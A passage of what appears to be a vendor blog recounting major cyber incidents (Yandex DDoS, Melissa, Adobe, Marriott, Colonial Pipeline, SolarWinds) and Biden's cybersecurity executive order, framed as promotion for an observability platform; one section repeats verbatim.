It’s not just the frequency that’s increased. The scale of attacks continues to grow too. From 2015 to 2020, total revenue lost to cybercrime rose from around 1 billion US dollars to 4.2 billion. Of the 15 biggest data breaches in history, 7 were in the last three years. Cybercrime isn’t a threat that’s going away any time soon.

So, what’s to be done? If you’re one of the many businesses currently reassessing your cybersecurity policy, here’s what you can learn from some of the largest, most notorious, and most damaging cybersecurity incidents in history.

cyber security hacker

1.    Yandex DDoS Attacks (2021)

The first entry on our list is also the most recent. Through August-September of 2021, Russian tech powerhouse Yandex was hit by what’s thought to be the largest DDoS attack ever received.

DDoS attacks (distributed denial-of-service) are one of the oldest tricks in the cybercriminal and hacker handbooks. In a nutshell, attackers disrupt (or shut down) your systems by flooding your network with requests. It’s one of the simplest cybersecurity threats to understand; attackers overload your systems, rendering them inoperable and disrupting your business.

According to Yandex, their servers were hit with almost 22 million requests per second (RPS). Thankfully for Yandex, and rarely for incidents like these, no user data was compromised (that we know of so far). DDoS attacks rarely end well for the businesses at the receiving end.

What DDoS attacks mean for your business

DDoS attacks cost small and medium-sized businesses in excess of $120k on average. For large enterprises, this figure is regularly over $2 million. DDoS attacks are nothing new, but they still account for a staggering amount of cybercrime.

DDoS attacks are targeted. They need to be countered in real-time, not something you can rely on your firewall to rebuff. This is why observability platforms are essential tools in any security architecture. Without full visibility and real-time analytics, it’s impossible to counter the waves of requests before they overwhelm your system.

With a modern observability platform, you can safeguard against DDoS activity. Your platform will flag suspicious activity as it happens, allowing you to isolate responsible clients and close connections, shutting off the compromised components or servers before the entire system is driven offline.

2.    The Melissa Virus (1999)

The Melissa virus was one of the first large-scale cybersecurity incidents to receive international press coverage.

The trojan malware embedded itself in Microsoft Outlook, spread via email in infected Word documents. From being released in March 1999, Melissa spread until it ended up causing an estimated $80m in damages.  

It was the first of a format we’re now all familiar with. Users would receive an email from a known contact. The email would contain a document that, when opened, would embed Melissa onto the new machine (and forward itself to contacts in the new user’s Outlook address book).

Melissa’s activity created so much internal traffic within enterprise-level networks that it took many online. Those impacted included Microsoft and the United States Marine Corps. It’s difficult to pinpoint the exact number of systems disrupted, but it was a wake-up call during the early years of digital adoption: cybersecurity matters.

What we can learn from the Melissa virus today

Despite the Melissa virus incident happening over 20 years ago, email-spread trojans and malware remain a threat. Raising awareness can only cover so many bases. There are always going to be one or two people who fall for a spam email.

Not to mention that cybercriminals are always growing more sophisticated. Every so often there’ll be a new release that slips through the spam filter. In 2019, Business Email Compromise (BEC) attacks cost US businesses $1.7 billion in losses.

It is possible to safeguard against human error and an evolving threat landscape, however. By setting up Secure Email Gateways (SEG’s) and monitoring them in real-time, engineers are alerted to suspicious activity before it lands in the inbox. Catching trojans and malware before they’re embedded in your systems is much easier than removing them once they’re in.

3.    Adobe Cyber Attack (2013)

The 2010s saw many high-profile cybersecurity incidents of all kinds. With more of us uploading our personal details to businesses data centers than ever, data breaches became a particular focus. The Adobe 2013 breach was one of the largest of the decade.

It’s easy to see why the breach brought Adobe so much negative press. In October 2013 details of over 38 million Adobe users were stolen, and this included almost 3 million credit card numbers. To call it a PR disaster for Adobe would be an understatement.

Adobe ended up receiving a class action lawsuit which they settled for an undisclosed amount, however, it’s known they faced at least $1.2 million in legal fees alone. The breach led to Adobe completely restructuring its approach to cybersecurity. However, for many affected customers, it was too little, too late.

Why the Adobe breach is so important

The early 2010s were a time of mass migration from on-site infrastructures to the cloud. It was this process that the Adobe hackers exploited. A due-to-be decommissioned backup server was targeted. From here the hackers lifted around 40GB of data.

A key reason the breach was so damning for Adobe was that it could have been avoided. The vulnerable server still existed as part of the system, yet became a blind spot to Adobe’s security architecture. The solution Adobe relied on lacked full system visibility. Hackers had the freedom to operate within the soon-to-be disconnected server completely undetected.

In our landscape of remote servers and as-a-Service cloud platforms, security systems need to have constant observability overall components in your system. Even inactive ones. Nothing in your system can be considered isolated, as all of it is reachable by a determined enough hacker.

4.    Marriott Hotels Breach (2014-2018)

The Marriott International breach is a lesson in why it’s vital to regularly reassess your cybersecurity. For four years, Marriott’s systems were accessed through an undetected, unprotected back door. How did this happen? Because when Marriott acquired the smaller Starwood Hotels in 2016, they failed to ensure Starwood’s IT infrastructure was up to their own standards.

Fast forward to 2018, and Marriott finds themselves having to report that as many as 339 million guest records have been leaked. While Marriott responded appropriately by reporting the breach to their customers and the relevant UK authorities immediately, failure to adequately secure their systems landed them with an £18.4m fine ($24.8m US).

Marriott made a crucial mistake when they acquired Starwood Hotels. Instead of migrating Starwood’s infrastructure over to their own, they allowed the smaller company to continue using their current (insecure) systems. As soon as these systems were connected to Marriott’s main infrastructure it opened the doors for the hackers already in Starwood’s servers.

The lessons learned from the Marriott Breach

The simple fact of the Marriott breach, and why they received such a hefty fine, is this: the breach could have been avoided. Hackers shouldn’t have been able to operate in the Marriott systems for two years.

The Marriott ecosystem wasn’t unique. Many enterprise IT ecosystems are made of interlinked internal infrastructures of businesses under the company umbrella. If you lack visibility over the other systems of the wider infrastructure your own are never really secure.

With an observability and visibility platform as part of your security solution, breaches such as the Marriott’s are safeguarded against. Automated discovery and ML/AI-driven alerting ensure that, when your infrastructure gains a new segment, any suspicious activity or exploited weaknesses are highlighted immediately.

5.    Colonial Pipeline Ransomware Attack (2021)

Rounding off our list is perhaps the most widely covered cybersecurity incident of the last decade. In May this year (2021), American oil pipeline and fuel supplier Colonial Pipeline Company was hit with one of the largest scale ransomware attacks in history. The attack targeted computerized equipment, resulting in the entire pipeline halting operations to keep it contained. Not only were the financial damages of this to the US economy astronomical, but Colonial Pipeline also confirmed it paid nearly $5m in ransom.

The group responsible, DarkSide, managed to enter Colonial’s systems by exploiting an unused company VPN account with a compromised password. How this password was acquired is still unknown. The account in question was considered inactive by Colonial’s teams but could still access internal systems (as evidenced by the success of the attack).

How much financial damage occurred from the incident, both to Colonial themselves and the wider US economy, is still being calculated. What took no time to figure out was that even companies as large and national infrastructure supporting as Colonial Pipeline is vulnerable to cyber attack.

Could the Colonial Pipeline attack have been avoided?

The Colonial Pipeline breach made clear just how far both the private and public sectors still have to go when it comes to cybersecurity. The attack is considered by some to have been the impetus behind Joe Biden’s executive order mandating high-security standards across US government services.

Ultimately yes, the attack could have been avoided. The group responsible gained entry with a single password, and once again remote access was a weak point the hackers were able to exploit. If Colonial had a more robust and prioritized approach to the security of their systems the suspicious activity from the previously-offline account would have flagged an alert.

The attack is especially alarming when you consider how much of the US infrastructure relies on Colonial lines. The shortages from the brief switch-off caused average gas prices to rise above $3/gallon for the first time since 2014.

The Three Essential Cyber Security Lessons to Learn from History

The lessons from these examples are obvious. There are common themes that occur throughout, and avoiding these perfect storms of system vulnerability isn’t as difficult as it seems.

Chiefly, it’s important to have a robust security culture throughout your staff. This includes non-IT personnel, too. In almost every example it was a lackluster or short-sighted approach to cybersecurity, be it from those responsible or from staff ignoring warnings about spam, that led to an exploited vulnerability.

The other main lesson is that the technology you rely on needs to be adaptive. It’s not enough to rely on a library of already-known viruses and malware. You need a security system that can self-update and remain on top of the ever-evolving cyber threat ecosystem. Fortunately, many modern platforms can harness AI, machine learning, and cloud capabilities to automate this process, meaning you’re never using yesterday’s security to safeguard against tomorrow’s threats.

Finally, it’s obvious that system-wide monitoring and visibility are key. An observability platform is an essential part of any modern security solution. Many of the above could have been avoided entirely if a robust observability platform was in place. Every blind spot is a vulnerability. It’s clear that any successful security solution will have to remove them at its core. With a modern observability platform such as Coralogix, this is easier than it’s ever been. 

How Biden’s Executive Order on Improving Cybersecurity Will Impact Your Systems

Posted on by eugene evdokimov

President Joe Biden recently signed an executive order which made adhering to cybersecurity standards a legal requirement for federal departments and agencies.

The move was not a surprise. It comes after a string of high-profile cyber-attacks and data breaches in 2020 and 2021. The frequency and scale of these events exposed a clear culture of lax cybersecurity practices throughout both the public and private sectors.

President Biden’s order brings into law many principles which have long been espoused by cybersecurity advocacy groups, such as the National Institute of Standards and Technology (NIST)’s Five Functions. It is the latest legislation in a trend towards greater transparency and regulation of technology in the US.

The Executive Order on Improving the Nation’s Cybersecurity puts in place safeguards that have until now been lacking or non-existent. While regulations are only legally binding for public organizations (and their suppliers), many see it as a foreshadowing of further regulation and scrutiny of cybersecurity in the private sector.

Despite not being directly impacted, a memo was sent out from the White House to corporate leaders urging them to act as though regulations are legally binding. It’s clear that businesses must take notice of Biden’s drive to safeguard US national infrastructure against cyber threats.

What’s in the Executive Order on Improving the Nation’s Cyber Security

The order spans almost sections and covers a range of issues, but there are several which stand out as likely to become relevant to the private sector.

Chief of these is a requirement for IT and OT providers who supply government and public bodies to store and curate data in accordance with new regulations. They must also report any potential incidents and cooperate with any government operation to combat a cyber threat.

The order also implies future changes for secure software development, with the private sector encouraged to develop standards and display labels confirming their products’ security and adherence to regulatory standards. Some also theorize that government-only mandates for two-factor authentication, encryption, and cloud security, could include private organizations soon.

The key takeaway for businesses is that, whether it’s next year or a decade from now, it’s likely they’ll be required by law to maintain secure systems. If your security, logging, or systems observability are lacking, Biden’s executive order could be your last warning to get them up-to-scratch before regulations become legally binding.

How does this affect my systems?

Many enterprises are acting as though the executive order is legally binding. This is in no small part due to the White House’s memo urging businesses to do so. A common view is that it won’t be long before regulations outlined in the EO are expanded beyond government.

For suppliers to the government, any laws passed following Biden’s order immediately apply. This even extends to IT/OT providers whose own customers include the government as their customers. In short, if any part of your system(s) handles government data, you’ll be legally required to secure them according to the regulatory standards.

Data logging and storage regulations

Logging and storage is a key EO focal point. Compliant businesses will have system logs properly collected, maintained, and ready for access should they be required as part of an intelligence or security investigation.

This move is to enhance federal abilities to investigate and remediate threats, and covers both internal network logs and logging data from 3rd party connections. Logs will have to, by law, be available immediately on request. Fortunately, many end-to-end logging platforms make compliance both intuitive and cost-effective.

System visibility requirements

Under the EO, businesses will be required to share system logs and monitoring data when requested. While there aren’t currently legal mandates outlining which data this includes, a thorough and holistic view of your systems will be required during any investigation.

With the order itself stating that “recommendations on requirements for logging events and retaining other relevant data” are soon to come, and shall include “the types of logs to be maintained, the time periods to retain the logs and other relevant data, the time periods for agencies to enable recommended logging and security requirements, and how to protect logs”, it’s clear that future cybersecurity legislation won’t be vague. Compliance requirements, wherever they’re applied, will be specific.

In the near future, businesses found to have critical system visibility blind spots could face significant legal ramifications. Especially if said blind spots become an exploited vulnerability in a national cybercrime or cybersecurity incident.

The legal onus will soon be on businesses to ensure their systems don’t contain invisible back doors into the wider national infrastructure. Your observability platform must provide full system visibility.

Secure services

The EO also included suggestions for software and service providers to create a framework for advertising security compliance as a marketable selling point.

While this mainly serves to create a competitive drive to develop secure software, it’s also to encourage businesses to be scrupulous about 3rd parties and software platforms they engage.

In the not-too-distant future, businesses utilizing non-compliant or insecure software or services will likely face legal consequences. Again, the ramifications will be greater should these insecure components be found to have enabled a successful cyberattack. Moving forward, businesses need to show 3rd party services and software they deploy unprecedented levels of scrutiny. 

Security should always be the primary concern. While this should have been the case anyway, the legal framework set out by Biden’s executive order means that investing in only the most secure 3rd party tools and platforms could soon be a compliance requirement. How does this affect my systems?

Many enterprises are acting as though the executive order is legally binding. This is in no small part due to the White House’s memo urging businesses to do so. A common view is that it won’t be long before regulations outlined in the EO are expanded beyond government.

For suppliers to the government, any laws passed following Biden’s order immediately apply. This even extends to IT/OT providers whose own customers include the government as their customers. In short, if any part of your system(s) handles government data, you’ll be legally required to secure them according to the regulatory standards.

Data logging and storage regulations

Logging and storage is a key EO focal point. Compliant businesses will have system logs properly collected, maintained, and ready for access should they be required as part of an intelligence or security investigation.

This move is to enhance federal abilities to investigate and remediate threats, and covers both internal network logs and logging data from 3rd party connections. Logs will have to, by law, be available immediately on request. Fortunately, many end-to-end logging platforms make compliance both intuitive and cost-effective.

System visibility requirements

Under the EO, businesses will be required to share system logs and monitoring data when requested. While there aren’t currently legal mandates outlining which data this includes, a thorough and holistic view of your systems will be required during any investigation.

With the order itself stating that “recommendations on requirements for logging events and retaining other relevant data” are soon to come, and shall include “the types of logs to be maintained, the time periods to retain the logs and other relevant data, the time periods for agencies to enable recommended logging and security requirements, and how to protect logs”, it’s clear that future cybersecurity legislation won’t be vague. Compliance requirements, wherever they’re applied, will be specific.

In the near future, businesses found to have critical system visibility blind spots could face significant legal ramifications. Especially if said blind spots become an exploited vulnerability in a national cybercrime or cybersecurity incident.

The legal onus will soon be on businesses to ensure their systems don’t contain invisible back doors into the wider national infrastructure. Your observability platform must provide full system visibility.

Secure services

The EO also included suggestions for software and service providers to create a framework for advertising security compliance as a marketable selling point.

While this mainly serves to create a competitive drive to develop secure software, it’s also to encourage businesses to be scrupulous about 3rd parties and software platforms they engage.

In the not-too-distant future, businesses utilizing non-compliant or insecure software or services will likely face legal consequences. Again, the ramifications will be greater should these insecure components be found to have enabled a successful cyberattack. Moving forward, businesses need to show 3rd party services and software they deploy unprecedented levels of scrutiny. 

Security should always be the primary concern. While this should have been the case anyway, the legal framework set out by Biden’s executive order means that investing in only the most secure 3rd party tools and platforms could soon be a compliance requirement.

Why now?

The executive order didn’t come out of the blue. In the last couple of years, there have been several high-profile, incredibly damaging cyberattacks on government IT suppliers and critical national infrastructure.

Colonial Pipeline Ransomware Attack

The executive order was undoubtedly prompted by the Colonial Pipeline ransomware attack. On May 7th, 2021, ransomware created by hacker group DarkSide compromised critical systems operated by the Colonial Pipeline Company. The following events led to Colonial Pipeline paying $4.4million in ransom, and the subsequent pipeline shutdown and slow operation period caused an emergency fuel shortage declaration in 17 states.

SolarWinds Supply Chain Attack

The Colonial Pipeline ransomware attack was the just latest high-impact cybercrime event with a national impact. In December 2020 SolarWinds, an IT supplier with government customers across multiple executive branches and military/intelligence services compromised their own system security with an exploitable update.

This ‘supply chain attack’ deployed trojans into SolarWinds customers’ systems through the update. The subsequent vulnerabilities opened a backdoor entrance into many highly classified government databases, including Treasury email traffic.

Why is it necessary?

While the damage of the Colonial Pipeline incident can be measured in dollars, the extent of the SolarWinds compromise has not yet been quantified. Some analysts believe the responsible groups could have been spying on classified communications for months. SolarWinds also had significant private sector customers including Fortune500 companies and universities, many of which could have been breached and still be unaware.

Again, these incidents are the latest in several decades marked by increasingly severe cyberattacks. Unless action is taken, instances of cybercrime that threaten national security will become not only more commonplace but more damaging.

Cybersecurity: An unprecedented national concern

Cybercrime is a unique threat. A single actor could potentially cause trillions of dollars in damages (assuming their goal is financial and not something more sinister). What’s more, the list of possible motivations for cybercriminals is far wider.

Whereas a state or non-state actor threatening US interests with a physical attack is usually politically or financially motivated (thus easier to predict), there have been many instances of ‘troll hackers’ targeting organizations for no reason other than to cause chaos.

When you factor this in with the constantly evolving global technical ecosystem, lack of regulation looks increasingly reckless. The threat of domestic terrorism is seen as real enough to warrant tight regulation of air travel (for example). Biden’s executive order is a necessary step towards cybercrime being treated as the equally valid threat it is.

Cybersecurity: A necessary investment long before Biden’s EO

Biden’s EO has shaken up how both the government and private sector are approaching cybersecurity. However, as the executive order itself and the events that preceded it prove, it’s a conversation that should have been happening much sooner.

The key takeaway for businesses from the executive order should be that none of the stipulations and requirements are new. There is no guidance in the EO which cybersecurity advocacy groups haven’t been espousing for decades.

Security, visibility, logging, and data storage/maintenance should be core focuses for your businesses’ IT teams already. The security of your systems and IT infrastructure should be paramount, before any attempts to optimize their effectiveness as a productivity and revenue boost.

Fortunately, compliance with any regulations the EO leads to doesn’t have to be a challenge. 3rd party platforms such as Coralogix offer a complete, end-to-end observability and logging solution which keeps your systems both visible and secure.

What’s more, the optimized costs and enhanced functionality over other platforms mean compliance with Biden’s EO needn’t be a return-free investment.